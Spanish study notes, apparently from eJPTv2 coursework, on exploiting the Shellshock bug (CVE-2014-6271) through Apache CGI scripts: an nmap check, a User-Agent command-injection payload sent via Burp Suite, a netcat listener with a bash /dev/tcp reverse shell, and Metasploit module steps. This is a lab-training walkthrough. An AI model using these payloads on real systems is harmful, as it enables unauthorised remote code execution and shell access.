⟁ HXA πŸ‡¬πŸ‡§ EN 
β”Œβ”€[ Apache ShellShock ]──────────────────────────────────────────────────────────────────────────────
β”‚ user: Alejandro Lopez Aguilar
β”” path: /apuntes/ejptv2/explotacion/linux/apache-shellshock/
El CVE-2014-6271, conocido como "Shellshock", es una vulnerabilidad crΓ­tica encontrada en Bash. La 
falla permite a los atacantes ejecutar comandos arbitrarios al utilizar ciertas variables de 
entorno, comprometiendo potencialmente la seguridad del sistema afectado.

Esta explotaciΓ³n, se realiza sobre scripts CGI. En primer lugar, realizamos un escanΓ©o y 
visualizamos que hay sobre el puerto 80 y Apache

:: β–Έ ExplotaciΓ³n Manual

β”Œβ”€[ code ]──────────────────────────────────────────────────────────────────────────────────────────
nmap -sV <ip>
└───────────────────────────────────────────────────────────────────────────────────────────────────
Visualizando el cΓ³digo fuente de la web, podemos encontrar un cgi en ejecucion (/gettime.cgi)

~ β–Έ Comprobar Vulnerabilidad

β”Œβ”€[ code ]──────────────────────────────────────────────────────────────────────────────────────────
nmap -sV <IP> β€”script=http-shellshock β€”script-args β€œhttp-shellshock.uri=<ruta del script cgi>”
└───────────────────────────────────────────────────────────────────────────────────────────────────
Si vemos que es vulnerable podemos ejecutar comandos usando burpsuite

Una vez vemos que es vulnerable, iniciamos BurpSuite, activamos el proxy en FoxyProxy y hacemos una 
peticiΓ³n a la ruta donde se encuentra el script cgi

Podemos cambiar el user agent

*() { :; }; echo; echo; /bin/bash -c '<comando>'*

Podemos obtener una rev shell poniendonos en escucha con nc

β”Œβ”€[ code ]──────────────────────────────────────────────────────────────────────────────────────────
nc -nlvp
└───────────────────────────────────────────────────────────────────────────────────────────────────
Ejecutamos el siguiente comando en el user agent para obtener la rev shell

bash -i >& /dev/tcp/<IP_LOCAL>/<PUERTO_LOCAL>/ 0>%1

:: β–Έ ExploitaciΓ³n Metasploit (Recomendado)

Usamos el mΓ³dulo: exploit/multi/http/apache_mod_cgi_bash_env_exec

β”Œβ”€[ code ]──────────────────────────────────────────────────────────────────────────────────────────
use exploit/multi/http/apache_mod_cgi_bash_env_exec	
set RHOST <IP vΓ­ctima>
set TARGETURI <ruta del script cgi>
set LHOST <ip propia>
exploit
└───────────────────────────────────────────────────────────────────────────────────────────────────

ret <volume_4>  <indice>